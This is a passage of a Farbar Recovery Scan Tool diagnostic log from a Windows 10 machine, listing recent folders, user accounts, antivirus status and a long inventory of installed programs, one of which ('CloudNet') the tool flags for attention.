2019-11-08 12:53 - 2017-05-27 13:55 - 000000000 ____D C:\Users\SR\Documents\Flight Simulator X Files
2019-11-03 17:55 - 2017-05-25 17:30 - 000000000 ____D C:\Program Files\Mozilla Firefox
2019-11-03 17:55 - 2017-05-25 17:30 - 000000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2019-11-03 13:05 - 2017-11-15 14:46 - 000001275 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Firefox.lnk
2019-10-31 10:47 - 2019-04-17 23:11 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\IconShepherd
2019-10-31 10:47 - 2019-04-17 23:11 - 000000000 ____D C:\Program Files\IconShepherd
2019-10-29 10:07 - 2018-03-01 10:19 - 000000000 ____D C:\WINDOWS\system32\Drivers\wd
2019-10-28 22:32 - 2018-12-02 22:13 - 000000000 ____D C:\Users\SR\Documents\FIFA 19

==================== Files in the root of some directories ========

2019-08-11 17:16 - 2019-08-11 17:16 - 000137168 _____ (Mozilla Foundation) C:\ProgramData\mozglue.dll
2019-08-11 17:16 - 2019-08-11 17:16 - 001246160 _____ (Mozilla Foundation) C:\ProgramData\nss3.dll
2017-06-18 13:13 - 2019-10-20 14:44 - 000000132 ____H () C:\Users\SR\AppData\Roaming\Adobe PNG Format CC Prefs
2017-05-27 13:13 - 2017-05-27 13:13 - 000001167 ____H () C:\Users\SR\AppData\Roaming\trace_FilterInstaller.1.txt
2017-05-27 13:13 - 2017-05-29 13:58 - 000000905 ____H () C:\Users\SR\AppData\Roaming\trace_FilterInstaller.txt
2017-05-27 13:13 - 2017-05-29 13:58 - 000000000 ____H () C:\Users\SR\AppData\Roaming\trace_FilterInstaller.txt-CRT.txt
2019-06-01 18:59 - 2019-10-20 14:40 - 000001456 _____ () C:\Users\SR\AppData\Local\Adobe Save for Web 13.0 Prefs
2018-11-26 20:34 - 2019-11-16 00:19 - 000006144 _____ () C:\Users\SR\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
2018-09-27 17:57 - 2018-09-27 17:57 - 000000000 _____ () C:\Users\SR\AppData\Local\oobelibMkey.log
2017-06-05 14:13 - 2017-07-14 23:32 - 000007598 _____ () C:\Users\SR\AppData\Local\Resmon.ResmonCfg
2018-03-01 13:55 - 2019-07-25 12:32 - 000001207 _____ () C:\Users\SR\AppData\Local\SuperJolt.Common.log
2018-03-01 13:55 - 2019-07-25 12:32 - 000002529 _____ () C:\Users\SR\AppData\Local\SuperJolt.Snapper.log
2017-06-10 15:40 - 2017-06-12 13:14 - 000930816 _____ () C:\Users\SR\AppData\Local\test_db_cara.db

==================== SigCheck ============================

(There is no automatic fix for files that do not pass verification.)

==================== End of FRST.txt ========================

 

 

Additional scan result of Farbar Recovery Scan Tool (x64) Version: 24-11-2019
Ran by SR (25-11-2019 10:22:22)
Running from D:\Users\SR\Downloads
Windows 10 Pro Version 1803 17134.345 (X64) (2018-06-02 13:24:39)
Boot Mode: Normal
==========================================================


==================== Accounts: =============================

Administrator (S-1-5-21-3967059023-4107875624-2872843465-500 - Administrator - Disabled) => C:\Users\Administrator
DefaultAccount (S-1-5-21-3967059023-4107875624-2872843465-503 - Limited - Disabled)
Guest (S-1-5-21-3967059023-4107875624-2872843465-501 - Limited - Enabled)
HomeGroupUser$ (S-1-5-21-3967059023-4107875624-2872843465-1006 - Limited - Enabled)
SR (S-1-5-21-3967059023-4107875624-2872843465-1001 - Administrator - Enabled) => C:\Users\SR
WDAGUtilityAccount (S-1-5-21-3967059023-4107875624-2872843465-504 - Limited - Disabled)

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installed Programs ======================

(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

Accu-Sim 182 Skylane for FSX (HKLM-x32\...\Accu-Sim 182 Skylane for FSX) (Version:  - )
Accu-Sim Bonanza 35 for Flight Simulator X (HKLM-x32\...\{55DBEDCF-367F-449E-B90C-43416D468ED1}) (Version: 18.9.15.1 - A2A Simulations Inc.) Hidden
Accu-Sim Bonanza 35 for Flight Simulator X (HKLM-x32\...\Accu-Sim Bonanza 35 for Flight Simulator X 18.9.15.1) (Version: 19.5.24.0 - A2A Simulations Inc.)
Adobe Creative Cloud (HKLM-x32\...\Adobe Creative Cloud) (Version: 3.9.1.335 - Adobe Systems Incorporated)
Adobe Flash Player 32 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 32.0.0.223 - Adobe)
Adobe Photoshop CC 2015 (HKLM-x32\...\{793C2BF7-A4FE-4608-91C9-9282C5801C21}) (Version: 16.0 - Adobe Systems Incorporated)
Adobe Premiere (HKLM\...\{C1CB876C-A08E-4692-B525-42848BD154D7}) (Version: 1.0.0000 - Adobe Systems Incorporated) Hidden
Adobe Premiere Pro CC 2017 (HKLM-x32\...\PPRO_11_0_1) (Version: 11.0.1 - Adobe Systems Incorporated)
Aerosoft's - Aerosoft Launcher (HKLM-x32\...\{EE11CFFC-898C-4875-8A63-8B732A9AD43B}) (Version: 1.1.0.1 - Aerosoft)
Aerosoft's - Airbus A320-A321 - FSX STEAM Edition (HKLM-x32\...\Airbus A320-A321 - FSX STEAM Edition) (Version: 1.30 - Aerosoft)
Aerosoft's - Diamond DA20-100 Katana 4X (HKLM-x32\...\{974BF461-4D2C-448A-B05B-502AEA41B7FB}) (Version: 1.04 - Aerosoft)
aerosoft's - FlightSim Commander 9 (HKLM-x32\...\{F941AABE-E868-42D9-9F38-884250F7898A}) (Version: E: - aerosoft)
aerosoft's - Professional Flight Planner X (HKLM-x32\...\{1A5D2729-4A3B-4CD5-85C8-4896FD44B78D}) (Version: 1.15 - aerosoft)
AES Crypt (HKLM\...\{562885D3-41A7-4211-822E-B1B1510069E5}) (Version: 3.10 - Packetizer, Inc.)
Altiverb 6 (HKLM-x32\...\Altiverb 6) (Version:  - )
Apple Application Support (32-bit) (HKLM-x32\...\{5A659BE5-849B-484E-A83B-DCB78407F3A4}) (Version: 7.3 - Apple Inc.)
Apple Application Support (64-bit) (HKLM\...\{F8060941-C0AB-4BCE-88AC-F2FDA2E9F286}) (Version: 7.3 - Apple Inc.)
Apple Mobile Device Support (HKLM\...\{5FA8C4BE-8C74-4B9C-9B49-EBF759230189}) (Version: 12.1.0.25 - Apple Inc.)
Apple Software Update (HKLM-x32\...\{A30EA700-5515-48F0-88B0-9E99DC356B88}) (Version: 2.6.0.1 - Apple Inc.)
Application Verifier x64 External Package (HKLM\...\{B27BC1FC-8474-9E32-73C2-6F7CD58AD1E3}) (Version: 10.1.17763.132 - Microsoft) Hidden
Application Verifier x64 External Package (HKLM\...\{F02CC6FE-37FC-3D47-F961-721D85BAF224}) (Version: 10.1.15063.674 - Microsoft) Hidden
Arena 3.5.1 (HKLM-x32\...\Arena 3.5.1_is1) (Version:  - )
ASIO4ALL (HKLM-x32\...\ASIO4ALL) (Version: 2.14 - Michael Tippach)
AudioEase Altiverb VST RTAS v6.10 (HKLM-x32\...\AudioEase Altiverb VST RTAS_is1) (Version:  - )
Autodesk Maya 2016 (HKLM\...\{3905B678-DC8D-4D5E-AA95-EA254D6C1239}) (Version: 16.0.1312.0 - Autodesk) Hidden
Autodesk Maya 2016 (HKLM\...\Autodesk Maya 2016) (Version: 16.0.1312.0 - Autodesk)
AutoHotkey 1.1.26.01 (HKLM\...\AutoHotkey) (Version: 1.1.26.01 - Lexikos)
Banished (HKLM-x32\...\1207660783_is1) (Version: 2.3.0.7 - GOG.com)
Bonjour (HKLM\...\{56DDDFB8-7F79-4480-89D5-25E1F52AB28F}) (Version: 3.1.0.1 - Apple Inc.)
BS.Player FREE (HKLM-x32\...\BSPlayerf) (Version: 2.72.1082 - AB Team, d.o.o.)
Camtasia 9 (HKLM\...\{B8A4CB7E-7F5B-484F-A127-E4431000EDCE}) (Version: 9.0.4.1948 - TechSmith Corporation) Hidden
Camtasia 9 (HKLM-x32\...\{5957dd25-bb4e-4234-9dc0-b3e10a70f636}) (Version: 9.0.4.1948 - TechSmith Corporation)
Camtasia Studio 8 (HKLM-x32\...\{BFA04EE0-8240-4667-8D53-45496A901C33}) (Version: 8.1.2.1327 - TechSmith Corporation)
Cheat Engine 6.7 (HKLM-x32\...\Cheat Engine 6.7_is1) (Version:  - Cheat Engine)
Cheat Engine 6.8.1 (HKLM-x32\...\Cheat Engine 6.8.1_is1) (Version:  - Cheat Engine)
ChessBase 14 (HKLM-x32\...\{EAC25C55-7C92-451B-94EE-D5BC3932A6A3}) (Version: 14.0.0.0 - ChessBase)
Chessmaster Grandmaster Edition (HKLM-x32\...\{27614800-84A9-484E-9CCB-43ED2F1205F5}) (Version: 1.00.0000 - Ubisoft) Hidden
Chessmaster Grandmaster Edition (HKLM-x32\...\InstallShield_{27614800-84A9-484E-9CCB-43ED2F1205F5}) (Version: 1.00.0000 - Ubisoft)
ClickOnce Bootstrapper Package for Microsoft .NET Framework (HKLM-x32\...\{D256A5B9-68DA-4F6C-A447-A93E5639A46D}) (Version: 4.7.03083 - Microsoft Corporation) Hidden
CloudNet (HKU\S-1-5-21-3967059023-4107875624-2872843465-1001\...\CloudNet) (Version: 20170301 - EpicNet Inc.) <==== ATTENTION
Deep Shredder 12 UCI (HKLM-x32\...\{14B6295D-6D03-4635-A17F-76AB10C74EF0}_is1) (Version:  - Stefan Meyer-Kahlen)
Desktop-Reminder 2 (HKLM-x32\...\{288487BA-D8C5-4C81-BD89-C7E49DD48E18}) (Version: 2.128 - Polenter - Software Solutions) Hidden
Desktop-Reminder 2 (HKLM-x32\...\Desktop-Reminder 2) (Version: 2.128 - Polenter - Software Solutions)
DiagnosticsHub_CollectionService (HKLM\...\{440C5592-4EA5-4772-B256-969D66068843}) (Version: 15.9.28016 - Microsoft Corporation) Hidden
DiskProtect190001 version 19.01 (HKLM-x32\...\{6EE85A71-720C-4C73-8920-9BE5B5BF803D}_is1) (Version: 19.01 - )
DisplayDriverAnalyzer (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_DisplayDriverAnalyzer) (Version: 397.93 - NVIDIA Corporation) Hidden
Dropbox (HKLM-x32\...\Dropbox) (Version: 85.4.155 - Dropbox, Inc.)
Dropbox Update Helper (HKLM-x32\...\{099218A5-A723-43DC-8DB5-6173656A1E94}) (Version: 1.3.241.1 - Dropbox, Inc.) Hidden
EaseUS MobiMover 4.5 (HKLM-x32\...\EaseUS MobiMover_is1) (Version:  - EaseUS)
E-muPatchMix DSP (HKLM-x32\...\EMU PatchMix DSP) (Version:  - )
Entity Framework 6.2.0 Tools  for Visual Studio 2017 (HKLM-x32\...\{B843915F-00A1-44B1-994C-1AE0A6400AE3}) (Version: 6.2.61807.0 - Microsoft Corporation) Hidden
EPSON L130 Series Printer Uninstall (HKLM\...\EPSON L130 Series) (Version:  - SEIKO EPSON Corporation)
Epson Software Updater (HKLM-x32\...\{7BAC3F7A-B963-468E-982E-B5608A87408D}) (Version: 4.4.4 - SEIKO EPSON CORPORATION)
Equalizer APO (HKLM\...\EqualizerAPO) (Version: 1.2 - )
eReg (HKLM-x32\...\{3EE9BCAE-E9A9-45E5-9B1C-83A4D357E05C}) (Version: 1.20.138.34 - Logitech, Inc.) Hidden
FIFA 19 (HKLM-x32\...\{3391E07D-8484-4124-817E-FCBDA859FD62}) (Version: 1.0.58.64628 - Electronic Arts)
FileMaker Pro 16 (HKLM-x32\...\{13552F4B-487E-49C0-9DCB-A6A3DC74110C}) (Version: 16.0.4.403 - FileMaker, Inc.) Hidden
FileMaker Pro 16 (HKLM-x32\...\{13552F4B-487E-49C0-9DCB-A6A3DC74110C}_FileMaker) (Version: 16.0.4.403 - FileMaker, Inc.)
Finale (HKLM\...\{48133FCD-8D55-4D52-A668-D1A988FC00C4}) (Version: 25.0.0.6858 - MakeMusic)
Flight One Software - GTN Series (HKLM-x32\...\F1T182T) (Version: 1.23 - Flight One Software)
FLT 7.0v2 (HKLM-x32\...\FLT 7.0v2_is1) (Version:  - The Foundry)
FMRTE 17.3.1.17 (HKLM\...\{72A84F14-6742-48AD-9B14-E9C1BE155F7A}_is1) (Version: 17.3.1.17 - FMRTE)
FMRTE 18.3.3.26 (HKLM\...\{DDBB4759-2DD1-4003-91B0-219DEF70DF13}_is1) (Version: 18.3.3.26 - FMRTE)
Folder Size (64-bit) (HKLM\...\{F24FF688-7138-4CCF-A83F-71E9FB01170E}) (Version: 2.6 - Brio)
Football Manager 2017 (HKLM\...\Football Manager 2017_is1) (Version: 1.0 - )
Football Manager 2017 Editor (HKLM\...\Football Manager 2017 Editor_is1) (Version: 1.0 - )
Football Manager 2018 (HKLM-x32\...\Football Manager 2018_is1) (Version:  - )
Garmin Aviation Checklist Editor (HKLM-x32\...\{51B555C4-F02B-44A5-8710-8EFE8FCB0589}) (Version: 2.3.0.0 - Garmin Ltd or its subsidiaries)
Garmin GTN Trainer (HKLM-x32\...\{FE8823C2-815A-493B-B3A4-DC2C20268AE8}) (Version: 6.21.0 - Garmin)
Global Prime - MetaTrader 4 (HKLM-x32\...\Global Prime - MetaTrader 4) (Version: 4.00 - MetaQuotes Software Corp.)
Google Earth Pro (HKLM\...\{70A0F34E-564B-4F93-ADD6-3BAEC6E44075}) (Version: 7.3.2.5776 - Google)
Google Update Helper (HKLM-x32\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.34.11 - Google LLC) Hidden
Greenshot 1.2.10.6 (HKLM\...\Greenshot_is1) (Version: 1.2.10.6 - Greenshot)
Gtk# for .Net 2.12.26 (HKLM-x32\...\{BC25B808-A11C-4C9F-9C0A-6682E47AAB83}) (Version: 2.12.26 - Xamarin, Inc.)
HD Tune Pro 5.50 (HKLM-x32\...\HD Tune Pro_is1) (Version:  - EFD Software)
icecap_collection_neutral (HKLM-x32\...\{A3B4D258-74E1-49D6-9A86-2DFEFEE48DEC}) (Version: 15.8.27906 - Microsoft Corporation) Hidden
icecap_collection_x64 (HKLM\...\{E524832A-C567-499A-8872-0D79596E4DEE}) (Version: 15.8.27906 - Microsoft Corporation) Hidden
icecap_collectionresources (HKLM-x32\...\{469961DF-482F-4213-ACD4-4AFD443F2A88}) (Version: 15.8.27924 - Microsoft Corporation) Hidden
icecap_collectionresourcesx64 (HKLM-x32\...\{12246E9A-D1A6-4D96-8CEA-CCFD064B16E2}) (Version: 15.8.27924 - Microsoft Corporation) Hidden
Icon Shepherd (HKLM\...\Icon Shepherd_is1) (Version: 19.10.2 - WinAbility Software Corp.)
IDM Crack 6.25 build 25 (HKLM-x32\...\IDM Crack 6.25 build 25) (Version: 5.40 - Crackingpatching.com Team)
InputMapper (HKLM-x32\...\{026D2025-A7FA-4F5C-AF8C-A6F7A9B917FC}) (Version: 1.6.10.19991 - DSDCS)
InputMapper HidGuardian (HKLM-x32\...\{3753F0EF-7F58-4BBA-B4EA-9E1B83C13B97}) (Version: 1.0.6320.17641 - DSDCS)
Intellisense Lang Pack Mobile Extension SDK 10.0.15063.0 (HKLM-x32\...\{87A8879A-3189-4E81-8D1A-0467301C5049}) (Version: 10.1.15063.674 - Microsoft Corporation) Hidden
IntelliTraceProfilerProxy (HKLM-x32\...\{ACBAA378-519A-441D-9349-C0AAD8DEAD04}) (Version: 15.0.17289.01 - Microsoft Corporation) Hidden
iTools 3 (HKLM-x32\...\ThinkSky) (Version:  - Shenzhen Thinksky Technology Co., Ltd.)
iTunes (HKLM\...\{D9D08A8F-5A03-486A-AD4D-3A438D521F8B}) (Version: 12.9.3.3 - Apple Inc.)
iZotope RX 5 (HKLM-x32\...\iZotope RX 5_is1) (Version: 5.01 - iZotope, Inc.)
Java 8 Update 231 (64-bit) (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F64180231F0}) (Version: 8.0.2310.11 - Oracle Corporation)
Java 8 Update 60 (64-bit) (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F86418060F0}) (Version: 8.0.600.27 - Oracle Corporation)
Java SE Development Kit 8 Update 60 (64-bit) (HKLM\...\{64A3A4F4-B792-11D6-A78A-00B0D0180600}) (Version: 8.0.600.27 - Oracle Corporation)
Kits Configuration Installer (HKLM-x32\...\{971E24EB-1096-64A5-10C0-7FD2D3774669}) (Version: 10.1.15063.674 - Microsoft) Hidden
Landing Rate Monitor (HKLM-x32\...\{B946315D-F716-492B-B914-718BC9A5D6D4}_is1) (Version: 4.0.0 - Bobby Allen)
Lexikon Sonate version 5.0 (HKLM-x32\...\Lexikon Sonate_is1) (Version: 5.0 - )
LLH5X (HKLM-x32\...\LLH5X) (Version:  - )
LLH7X (HKLM-x32\...\LLH7X) (Version:  - )
LLH8X (HKLM-x32\...\LLH8X) (Version:  - )
LLH-Heli (HKLM-x32\...\LLH-Heli) (Version:  - )
Logitech Options (HKLM\...\LogiOptions) (Version: 6.90.131 - Logitech)
Logitech SetPoint 6.69 (HKLM\...\sp6) (Version: 6.69.123 - Logitech)
loopMIDI (HKLM-x32\...\{55c0d955-4cee-452c-b393-d4c020a967d7}) (Version: 1.0.13.24 - Tobias Erichsen)
loopMIDI (HKLM-x32\...\{9E69C6CD-820A-44A9-9A0A-B7A56AD62A1E}) (Version: 1.0.13.24 - Tobias Erichsen) Hidden
loopMIDIBlockLegacy (HKLM-x32\...\{AEAF7978-3204-451D-8593-BC53EBDDA31D}) (Version: 9.9.9.9 - Tobias Erichsen) Hidden
Macro Recorder 5.7.1 (HKLM-x32\...\Macro Recorder_is1) (Version: 5.7.1 - Jitbit Software)
Malwarebytes version 4.0.4.49 (HKLM\...\{35065F43-4BB2-439A-BFF7-0F1014F2E0CD}_is1) (Version: 4.0.4.49 - Malwarebytes)
Mari 2.5v2 (HKLM\...\Mari 2.5v2_is1) (Version:  - The Foundry)
Max 7 (64-bit) (HKLM\...\{AB97A2FF-BA6F-4B15-8032-FF9A331AFF77}) (Version: 7.0.3 - Cycling '74)
MaxScore (HKLM-x32\...\MaxScore 0.8.41) (Version: 0.8.41 - maxscore)
MayaBonusTools (HKLM\...\{367B88BA-C90B-A1D3-81BA-7C5407698472}) (Version: 17.0.1 - Autodesk, Inc.)
Melodyne 3.1 (HKLM-x32\...\{9D623E1A-30E1-4E55-BD80-5C1359DB120B}) (Version: 3.1.0200 - Celemony Software GmbH) Hidden
Melodyne 3.1 (HKLM-x32\...\{A1F143D1-1F0D-44FB-A44B-71D4367D16DE}) (Version: 3.1.0200 - Celemony Software GmbH)
mental ray renderer for Autodesk Maya 2016 (HKLM\...\{59AC9438-6EE3-4B22-860F-525308329228}) (Version: 16.0.1312.0 - mental ray)
MetaStock 11.0 (HKU\S-1-5-21-3967059023-4107875624-2872843465-1001\...\MetaStock 11.0) (Version:  - )
Microsoft .NET Core SDK 2.1.509 (x64) (HKLM-x32\...\{305c8a42-62c1-4b59-b53f-09a9f066fd44}) (Version: 2.1.509 - Microsoft Corporation)
Microsoft Flight Simulator SimConnect Client v10.0.60905.0 (HKLM-x32\...\{D1AC9B0B-2727-4811-91DC-1FC3C4E47A9B}) (Version: 10.0.60905.0 - Microsoft Corporation)
Microsoft Flight Simulator SimConnect Client v10.0.61242.0 (HKLM-x32\...\{85DF6786-66AA-42EE-8616-AE456B07BD99}) (Version: 10.0.61242.0 - Microsoft Corporation)
Microsoft Flight Simulator SimConnect Client v10.0.61259.0 (HKLM-x32\...\{D61CA184-3F6D-4A50-B2CC-7A18447D6A8D}) (Version: 10.0.61259.0 - Microsoft Corporation)
Microsoft Flight Simulator X Steam Edition (HKLM-x32\...\Microsoft Flight Simulator X Steam Edition_is1) (Version:  - )
Microsoft Office Professional Plus 2016 - el-gr (HKLM\...\ProplusRetail - el-gr) (Version: 16.0.12228.20250 - Microsoft Corporation)
Microsoft Office Professional Plus 2016 - en-us (HKLM\...\ProplusRetail - en-us) (Version: 16.0.12228.20250 - Microsoft Corporation)
Microsoft OneDrive (HKU\.DEFAULT\...\OneDriveSetup.exe) (Version: 18.151.0729.0013 - Microsoft Corporation)
Microsoft OneDrive (HKU\S-1-5-21-3967059023-4107875624-2872843465-1001\...\OneDriveSetup.exe) (Version: 19.202.1013.0006 - Microsoft Corporation)
Microsoft SQL Server 2012 Express LocalDB  (HKLM\...\{E75776B2-EAE5-42F9-A800-0A10763DEDF0}) (Version: 11.0.2318.0 - Microsoft Corporation)
Microsoft System CLR Types for SQL Server vNext CTP1.6 (HKLM\...\{98DD6908-C582-452A-954D-E79E6DF0310A}) (Version: 15.0.600.33 - Microsoft Corporation)
Microsoft System CLR Types for SQL Server vNext CTP1.6 (HKLM-x32\...\{640EECB8-1962-4D23-ACB2-310107EC7ED9}) (Version: 15.0.600.33 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{6ce5bae9-d3ca-4b99-891a-1dc6c118a5fc}) (Version: 8.0.59192 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.21022 (HKLM\...\{350AA351-21FA-3270-8B7A-835434E766AD}) (Version: 9.0.21022 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 (HKLM-x32\...\{FF66E9F6-83E7-3A3E-AF14-8DE9A809A6A4}) (Version: 9.0.21022 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.60610 (HKLM-x32\...\{9634d50a-0c4d-4f52-8a9f-894a2baae370}) (Version: 11.0.60610.1 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.60610 (HKLM-x32\...\{a1909659-0a08-4554-8af1-2175904903a1}) (Version: 11.0.60610.1 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.60610 (HKLM-x32\...\{307a22b8-8353-4c5e-b67b-2404c5734558}) (Version: 11.0.60610.1 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.60610 (HKLM-x32\...\{95716cce-fc71-413f-8ad5-56c2892d4b3a}) (Version: 11.0.60610.1 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.40660 (HKLM-x32\...\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}) (Version: 12.0.40660.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2017 Redistributable (x64) - 14.16.27033 (HKLM-x32\...\{cc3a7c63-31fb-4129-9024-63ebefd86a95}) (Version: 14.16.27033.0 - Microsoft Corporation)
Microsoft Visual C++ 2017 Redistributable (x86) - 14.16.27033 (HKLM-x32\...\{624ba875-fdfc-4efa-9c66-b170dfebc3ec}) (Version: 14.16.27033.0 - Microsoft Corporation)
Microsoft Visual Studio Installer (HKLM\...\{6F320B93-EE3C-4826-85E0-ADF79F8D4C61}) (Version: 1.18.1104.625 - Microsoft Corporation)
MMFonts (HKLM-x32\...\{1DD5D3E6-8DF5-4657-8825-713C499CDCC0}) (Version: 1.1.1.1 - MakeMusic, Inc.)
Mozilla Firefox 61.0.2 (x86 en-US) (HKLM-x32\...\Mozilla Firefox 61.0.2 (x86 en-US)) (Version: 61.0.2 - Mozilla)
Mozilla Firefox 70.0.1 (x64 en-US) (HKLM\...\Mozilla Firefox 70.0.1 (x64 en-US)) (Version: 70.0.1 - Mozilla)
Mozilla Maintenance Service (HKLM\...\MozillaMaintenanceService) (Version: 64.0.2 - Mozilla)
Mp3tag v2.84a (HKLM-x32\...\Mp3tag) (Version: 2.84a - Florian Heidenreich)
MSI Development Tools (HKLM-x32\...\{577FB968-1AAC-A315-93D6-419725A69F36}) (Version: 10.1.15063.674 - Microsoft Corporation) Hidden
MSI Development Tools (HKLM-x32\...\{6C961B30-A670-8A05-3BFE-3947E84DD4E4}) (Version: 10.1.17763.132 - Microsoft Corporation) Hidden
MSXML 4.0 SP2 Parser and SDK (HKLM-x32\...\{716E0306-8318-4364-8B8F-0CC4E9376BAC}) (Version: 4.20.9818.0 - Microsoft Corporation)
Native Instruments Kontakt 5 (HKLM-x32\...\Native Instruments Kontakt 5) (Version: 5.7.3.37 - Native Instruments)
Network Addon Mod (HKU\S-1-5-21-3967059023-4107875624-2872843465-1001\...\Network Addon Mod) (Version: 36 - The NAM Team)
Notepad++ (32-bit x86) (HKLM-x32\...\Notepad++) (Version: 7.5.8 - Notepad++ Team)
NovaGOPlayer 7.3.3 (HKLM-x32\...\89399A59-11C3-4EBC-A59E-FBD13021BC07_is1) (Version: 7.3.3 - Forthnet Media SA)
NVAPI Monitor plugin for NvContainer (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_NvContainer.NvapiMonitor) (Version: 1.15 - NVIDIA Corporation) Hidden
NVIDIA 3D Vision Controller Driver 390.41 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.NVIRUSB) (Version: 390.41 - NVIDIA Corporation)
NVIDIA 3D Vision Driver 397.93 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.3DVision) (Version: 397.93 - NVIDIA Corporation)
NVIDIA GeForce Experience 3.19.0.94 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.GFExperience) (Version: 3.19.0.94 - NVIDIA Corporation)
NVIDIA Graphics Driver 397.93 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 397.93 - NVIDIA Corporation)
NVIDIA HD Audio Driver 1.3.37.4 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_HDAudio.Driver) (Version: 1.3.37.4 - NVIDIA Corporation)
NVIDIA PhysX System Software 9.17.0524 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.17.0524 - NVIDIA Corporation)
OANDA - MetaTrader (HKLM-x32\...\OANDA - MetaTrader) (Version: 4.00 - MetaQuotes Software Corp.)
OANDA Desktop (HKLM-x32\...\{1DAF3BB8-E27F-4698-9D7C-270985AA3BCE}) (Version: 2.6.3 - OANDA)
Office 16 Click-to-Run Extensibility Component (HKLM-x32\...\{90160000-008C-0000-0000-0000000FF1CE}) (Version: 16.0.12228.20250 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Extensibility Component 64-bit Registration (HKLM\...\{90160000-00DD-0000-1000-0000000FF1CE}) (Version: 16.0.12228.20250 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Licensing Component (HKLM\...\{90160000-008F-0000-1000-0000000FF1CE}) (Version: 16.0.12228.20250 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Localization Component (HKLM-x32\...\{90160000-008C-0408-0000-0000000FF1CE}) (Version: 16.0.12228.20250 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Localization Component (HKLM-x32\...\{90160000-008C-0409-0000-0000000FF1CE}) (Version: 16.0.12228.20250 - Microsoft Corporation) Hidden
